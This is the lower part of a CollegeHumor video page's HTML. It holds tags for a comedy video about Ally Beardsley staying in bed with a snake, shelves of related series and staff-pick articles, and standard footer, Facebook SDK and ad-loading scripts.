	      	<div class="video-main__details-content__tags"><ul class="tags"><li class="tag"><a data-ga-category="Tags" data-ga-label="College (college)" href="/video-tag/college"><span class="tag-tip"></span>College</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Money (money)" href="/video-tag/money"><span class="tag-tip"></span>money</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Fear (fear)" href="/video-tag/fear"><span class="tag-tip"></span>fear</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Animals (animals)" href="/video-tag/animals"><span class="tag-tip"></span>Animals</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Stunts (stunts)" href="/video-tag/stunts"><span class="tag-tip"></span>stunts</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Economy (economy)" href="/video-tag/economy"><span class="tag-tip"></span>economy</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Debt (debt)" href="/video-tag/debt"><span class="tag-tip"></span>debt</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Documentaries (documentaries)" href="/video-tag/documentaries"><span class="tag-tip"></span>documentaries</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Fails (fails)" href="/video-tag/fails"><span class="tag-tip"></span>fails</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Challenges (challenges)" href="/video-tag/challenges"><span class="tag-tip"></span>challenges</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Anxiety (anxiety)" href="/video-tag/anxiety"><span class="tag-tip"></span>anxiety</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Ally Beardsley (ally-beardsley)" href="/video-tag/ally-beardsley"><span class="tag-tip"></span>ally beardsley</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Grant O'brien (grant-obrien)" href="/video-tag/grant-obrien"><span class="tag-tip"></span>grant o'brien</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Freaking Out (freaking-out)" href="/video-tag/freaking-out"><span class="tag-tip"></span>freaking out</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Nailed It (nailed-it)" href="/video-tag/nailed-it"><span class="tag-tip"></span>nailed it</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Fuck This (fuck-this)" href="/video-tag/fuck-this"><span class="tag-tip"></span>fuck this</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Courage (courage)" href="/video-tag/courage"><span class="tag-tip"></span>courage</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Dares (dares)" href="/video-tag/dares"><span class="tag-tip"></span>dares</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Adam Frucci (adam-frucci)" href="/video-tag/adam-frucci"><span class="tag-tip"></span>adam frucci</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Total Forgiveness (total-forgiveness)" href="/video-tag/total-forgiveness"><span class="tag-tip"></span>total forgiveness</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Ally Has To Stay In Bed For Half An Hour With A  (ally-has-to-stay-in-bed-for-half-an-hour-with-a-)" href="/video-tag/ally-has-to-stay-in-bed-for-half-an-hour-with-a-"><span class="tag-tip"></span>ally has to stay in bed for half an hour with a </a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Can't Be Poisonous (cant-be-poisonous)" href="/video-tag/cant-be-poisonous"><span class="tag-tip"></span>can't be poisonous</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="14 Foot Anaconda (14-foot-anaconda)" href="/video-tag/14-foot-anaconda"><span class="tag-tip"></span>14 foot anaconda</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="That's Not A Legal U.s. Snake (thats-not-a-legal-us-snake)" href="/video-tag/thats-not-a-legal-us-snake"><span class="tag-tip"></span>that's not a legal u.s. snake</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="It Was So Easy To Find A Snake In La (it-was-so-easy-to-find-a-snake-in-la)" href="/video-tag/it-was-so-easy-to-find-a-snake-in-la"><span class="tag-tip"></span>it was so easy to find a snake in la</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Camouflage Sheets (camouflage-sheets)" href="/video-tag/camouflage-sheets"><span class="tag-tip"></span>camouflage sheets</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Angelina The Snake (angelina-the-snake)" href="/video-tag/angelina-the-snake"><span class="tag-tip"></span>angelina the snake</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="New Tinder Pic (new-tinder-pic)" href="/video-tag/new-tinder-pic"><span class="tag-tip"></span>new tinder pic</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Asking The Snake If They Have Debt (asking-the-snake-if-they-have-debt)" href="/video-tag/asking-the-snake-if-they-have-debt"><span class="tag-tip"></span>asking the snake if they have debt</a></li><li class="tag"><a data-ga-category="Tags" data-ga-label="Dain August (dain-august)" href="/video-tag/dain-august"><span class="tag-tip"></span>dain august</a></li></ul></div>
	            </div><!-- /.video-main__details-content -->
      <div class="video_main_details-clearfix clearfix"></div>
    </section><!-- /.video-main__details -->
  </main><!-- /.video-main -->

	<section class="shelf shelf--series js-shelf">
  <h3 class="shelf__hdr">ORIGINAL SERIES</h3>
  <p class="shelf__description">Want to watch some funny videos? Check out some our favorite series.</p>

  <div class="shelf-container">
    <ul class="shelf__list js-shelf__list">
      <li class="shelf__list-item">
        <a class="shelf__list-item-link" href="/um-actually" data-ga-feature-name="Original Series Shelf" data-ga-category="Original Series Shelf" data-ga-label="Um Actually [Pod]">
          <img class="shelf__list-item-image" src="https://media0ch-a.akamaihd.net/69/84/3c76d97989398ccdf3f493ff7b3fc0a0.jpg" alt="Um Actually" />
          <div class="shelf__list-item-details">
            <h4 class="shelf__list-item-details__title">Um Actually</h4>
            <p class="shelf__list-item-details__excerpt">The game show where nerds correct nerds. They don't get tired of it, so why should you?</p>
          </div>
        </a>
      </li>
      <li class="shelf__list-item">
        <a class="shelf__list-item-link" href="/hardlyworking" data-ga-feature-name="Original Series Shelf" data-ga-category="Original Series Shelf" data-ga-label="Hardly Working [Pod]">
          <img class="shelf__list-item-image" src="https://media0ch-a.akamaihd.net/20/64/0f41921135b18756553255c415a95d79.jpg" alt="Hardly Working" />
          <div class="shelf__list-item-details">
            <h4 class="shelf__list-item-details__title">Hardly Working</h4>
            <p class="shelf__list-item-details__excerpt">A workplace comedy about a comedy workplace.</p>
          </div>
        </a>
      </li>
      <li class="shelf__list-item">
        <a class="shelf__list-item-link" href="/hot-date" data-ga-feature-name="Original Series Shelf" data-ga-category="Original Series Shelf" data-ga-label="Hot Date [Pod]">
          <img class="shelf__list-item-image" src="https://media0ch-a.akamaihd.net/28/64/096432f795bdbafffc943f2375dbdbd5.jpg" alt="Hot Date" />
          <div class="shelf__list-item-details">
            <h4 class="shelf__list-item-details__title">Hot Date</h4>
            <p class="shelf__list-item-details__excerpt">Dive into rituals of dating with married comedic duo Emily Axford and Brian K. Murphy.</p>
          </div>
        </a>
      </li>
    </ul>
    <div class="shelf__cta">
      <a class="shelf__cta-link" href="/videos/" data-ga-feature-name="Original Series Shelf" data-ga-category="Original Series Shelf" data-ga-label="Browse All Series [Button]">BROWSE ALL SERIES</a>
    </div>
      </div>
</section><!-- /.shelf--series -->	<section class="shelf-section shelf--staff js-shelf">
  <h3 class="shelf__hdr">STAFF PICKS</h3>

  <div class="shelf-section-container js-shelf-section-container">
    <ul class="shelf__list js-shelf__list">
                    <li class="shelf__list-item">
          <a class="shelf__list-item-link" href="/post/7059137/some-comics-to-get-you-ready-for-the-holidays" data-ga-feature-name="Staff Picks Shelf" data-ga-category="Staff Picks Shelf" data-ga-label="Some Comics To Get You Ready For The Holidays [Pod]">
            <img class="shelf__list-item-image" src="http://0.media.collegehumor.cvcdn.com/10/84/b5981e125e9ab66f02e6d5a0ad541c30.jpeg" alt="" />
            <div class="shelf__list-item-details">
              <span class="shelf__list-item-details__cat">FEATURE</span>
              <h4 class="shelf__list-item-details__title clampMe">Some Comics To Get You Ready For The Holidays</h4>
              <div class="shelf__list-item-details__cta"><span class="icon fa fa-arrow-right"></span> READ</div>
            </div>
          </a>
        </li>
                    <li class="shelf__list-item">
          <a class="shelf__list-item-link" href="/post/7059013/this-kids-letters-to-santa-are-very-woke" data-ga-feature-name="Staff Picks Shelf" data-ga-category="Staff Picks Shelf" data-ga-label="This Kid's Letters To Santa Are VERY Woke [Pod]">
            <img class="shelf__list-item-image" src="http://1.media.collegehumor.cvcdn.com/87/72/6201c3c4b75e9f07086a754cd1fb1556.jpeg" alt="" />
            <div class="shelf__list-item-details">
              <span class="shelf__list-item-details__cat">FEATURE</span>
              <h4 class="shelf__list-item-details__title clampMe">This Kid's Letters To Santa Are VERY Woke</h4>
              <div class="shelf__list-item-details__cta"><span class="icon fa fa-arrow-right"></span> READ</div>
            </div>
          </a>
        </li>
                    <li class="shelf__list-item">
          <a class="shelf__list-item-link" href="/post/7059108/every-television-christmas-rom-com-ever" data-ga-feature-name="Staff Picks Shelf" data-ga-category="Staff Picks Shelf" data-ga-label="Every Television Christmas Rom-Com Ever [Pod]">
            <img class="shelf__list-item-image" src="http://0.media.collegehumor.cvcdn.com/41/95/f0a8a7c1990529b53c99d5650e38c4ed.jpeg" alt="" />
            <div class="shelf__list-item-details">
              <span class="shelf__list-item-details__cat">FEATURE</span>
              <h4 class="shelf__list-item-details__title clampMe">Every Television Christmas Rom-Com Ever</h4>
              <div class="shelf__list-item-details__cta"><span class="icon fa fa-arrow-right"></span> READ</div>
            </div>
          </a>
        </li>
                    <li class="shelf__list-item">
          <a class="shelf__list-item-link" href="/post/7058918/6-types-of-customers-retail-workers-have-to-deal-with-on-black-friday" data-ga-feature-name="Staff Picks Shelf" data-ga-category="Staff Picks Shelf" data-ga-label="6 Types of Customers Retail Workers Have To Deal With On Black Friday [Pod]">
            <img class="shelf__list-item-image" src="http://0.media.collegehumor.cvcdn.com/67/19/276ad3bfedbbba90f00cf025a1a43e83.jpeg" alt="" />
            <div class="shelf__list-item-details">
              <span class="shelf__list-item-details__cat">FEATURE</span>
              <h4 class="shelf__list-item-details__title clampMe">6 Types of Customers Retail Workers Have To Deal With On Black Friday</h4>
              <div class="shelf__list-item-details__cta"><span class="icon fa fa-arrow-right"></span> READ</div>
            </div>
          </a>
        </li>
                    <li class="shelf__list-item">
          <a class="shelf__list-item-link" href="/post/7058917/5-things-retail-workers-want-customers-to-know-for-black-friday" data-ga-feature-name="Staff Picks Shelf" data-ga-category="Staff Picks Shelf" data-ga-label="5 Things Retail Workers Want Customers To Know For Black Friday [Pod]">
            <img class="shelf__list-item-image" src="http://0.media.collegehumor.cvcdn.com/85/13/158f12955344f15f523a052c895c7f44.jpeg" alt="" />
            <div class="shelf__list-item-details">
              <span class="shelf__list-item-details__cat">FEATURE</span>
              <h4 class="shelf__list-item-details__title clampMe">5 Things Retail Workers Want Customers To Know For Black Friday</h4>
              <div class="shelf__list-item-details__cta"><span class="icon fa fa-arrow-right"></span> READ</div>
            </div>
          </a>
        </li>
          </ul>
    <aside class="ad ad--3">
      <div class="ad__inner">
        <div class="ad__image"></div>
      </div>
    </aside>
  </div>
</section><!-- /.shelf--staff -->	<div class="clear-waypoint"></div>
</div><!-- /.video -->

<!--VIEWDATA:40004128-->

		</div>
				</div>
	</div>
	<div id="ad-dynamic-footer"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-dynamic-footer"); }); }</script></div><footer class="site-footer">	
	<div class="site-footer__container">
		<section class="site-footer__links">
			<ul class="site-footer__links-list ga-feature-usage" data-ga-feature="Footer Links" data-ga-category="Footer" data-ga-label="Footer Links">
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/videos" data-ga-category="Footer" data-ga-label="Footer Links: Videos">Videos</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/tag/love-romance" data-ga-category="Footer" data-ga-label="Footer Links: Love/Relationships">Love/Relationships</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/comics" data-ga-category="Footer" data-ga-label="Footer Links: Comics">Comics</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/tag/movies" data-ga-category="Footer" data-ga-label="Footer Links: Movies/TV">Movies/TV</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/about" data-ga-category="Footer" data-ga-label="Footer Links: About">About</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/tag/food" data-ga-category="Footer" data-ga-label="Footer Links: Food">Food</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/tag/wtf" data-ga-category="Footer" data-ga-label="Footer Links: WTF">WTF</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/tag/life" data-ga-category="Footer" data-ga-label="Footer Links: Life">Life</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/tag/politics" data-ga-category="Footer" data-ga-label="Footer Links: Politics">Politics</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/articles" data-ga-category="Footer" data-ga-label="Footer Links: All Articles">All Articles</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/privacy" data-ga-category="Footer" data-ga-label="Footer Links: Privacy Policy">Privacy Policy</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/terms" data-ga-category="Footer" data-ga-label="Footer Links: Terms & Conditions">Terms & Conditions</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/contact" data-ga-category="Footer" data-ga-label="Footer Links: Contact">Contact</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/sitemap" data-ga-category="Footer" data-ga-label="Footer Links: Sitemap">Sitemap</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/sitemap/index" data-ga-category="Footer" data-ga-label="Footer Links: Index">Index</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="mailto:ads@collegehumor.com" data-ga-category="Footer" data-ga-label="Footer Links: Advertise">Advertise</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="http://iac.com/careers/job-listings" data-ga-category="Footer" data-ga-label="Footer Links: Jobs">Jobs</a></li>
									<li class="site-footer__links-item"><a class="site-footer__links-item-link" href="/try-dropout" data-ga-category="Footer" data-ga-label="Footer Links: Try DROPOUT">Try DROPOUT</a></li>
							</ul>
		</section><!-- /.site-footer__links -->

		<section class="site-footer__social">
			<ul class="site-footer__social-list ga-feature-usage" data-ga-feature="Footer Social Links" data-ga-category="Footer" data-ga-label="Social">
									<li class="site-footer__social-item"><a class="site-footer__social-item-link" href="http://www.youtube.com/CollegeHumor?sub_confirmation=1" target="_blank" data-ga-category="Footer" data-ga-label="Social: YouTube"><span class="site-footer__social-item-link__icon icon icon-youtube"></span><span class="site-footer__social-item-link__name">YouTube</span></a></li>
									<li class="site-footer__social-item"><a class="site-footer__social-item-link" href="http://www.facebook.com/CollegeHumor" target="_blank" data-ga-category="Footer" data-ga-label="Social: Facebook"><span class="site-footer__social-item-link__icon icon icon-facebook"></span><span class="site-footer__social-item-link__name">Facebook</span></a></li>
									<li class="site-footer__social-item"><a class="site-footer__social-item-link" href="http://www.twitter.com/CollegeHumor" target="_blank" data-ga-category="Footer" data-ga-label="Social: Twitter"><span class="site-footer__social-item-link__icon icon icon-twitter"></span><span class="site-footer__social-item-link__name">Twitter</span></a></li>
									<li class="site-footer__social-item"><a class="site-footer__social-item-link" href="https://www.instagram.com/collegehumor" target="_blank" data-ga-category="Footer" data-ga-label="Social: Instagram"><span class="site-footer__social-item-link__icon icon icon-instagram"></span><span class="site-footer__social-item-link__name">Instagram</span></a></li>
							</ul>

			<a class="site-footer__social-newsletter" href="https://www.collegehumor.com/static/newsletter" class="nav-newsletter"><span class="nav-label">Subscribe</span></a>
		</section><!-- /.site-footer__social -->
		
		<section class="site-footer__copyright">
			<div class="site-footer__copyright-logo"></div>
			<p class="site-footer__copyright-text">CHMEDIA &copy;2019 Connected Ventures, LLC.<br /> All Rights Reserved.</p>

			<a class="site-footer__copyright-top-link scroll-to back-to-top ga-feature-usage ga-interaction ga-interaction-click-only" data-ga-feature="Scroll Top" data-ga-category="Footer" href="#" data-ga-label="Back to Top">Top of Page</a>
		</section><!-- /.site-footer__copyright -->
	</div><!-- /.site-footer__container -->
</footer><!-- /.site-footer  -->
	<script type="text/javascript" defer src="http://1.static.collegehumor.cvcdn.com/js/packages/75820c6c18387f67d88fbe56f9c7ef16.js"></script>
	
	
			<div id="fb-root"></div>
<script>
	// setting facebook comment to take the width of the browser when we are on small device
	$( document ).ready(function() {
		var $browser_width = $( window ).width();
		if($browser_width >= 600){
			$browser_width = 600;
		}
		$('.fb-comments').attr('data-width',$browser_width - 30);
	});

	window.fbAsyncInit = function() {
		FB.init({
			appId: 271750421132,
			version: 'v2.7',
			status: true,
			cookie: true,
			oauth : true,
			xfbml: true
		});
		$('body').trigger('fbinit');
	};
	(function(d, s, id) {
		var js, fjs = d.getElementsByTagName(s)[0];
		if (d.getElementById(id)) return;
		js = d.createElement(s); js.id = id;
		js.src = "//connect.facebook.com/en_US/sdk.js";
		fjs.parentNode.insertBefore(js, fjs);
	}(document, 'script', 'facebook-jssdk'));
</script>	
		<div class="ad-adhesive-footer-wrapper">
		<div id="ad-adhesive-footer"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-adhesive-footer"); }); }</script></div>	</div>
		    <script>
      var adonis = adonis || {};
      adonis.conditionalAdRendering = true;
      adonis.scriptResources = ["prebid.js"];
      adonis.transport = 'https://9k6y.b2rrns9dgbx56tf5kc.agency/http';
    </script>
	<!-- Adonis loader.min.js --><script>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</script>
	</body>
</html>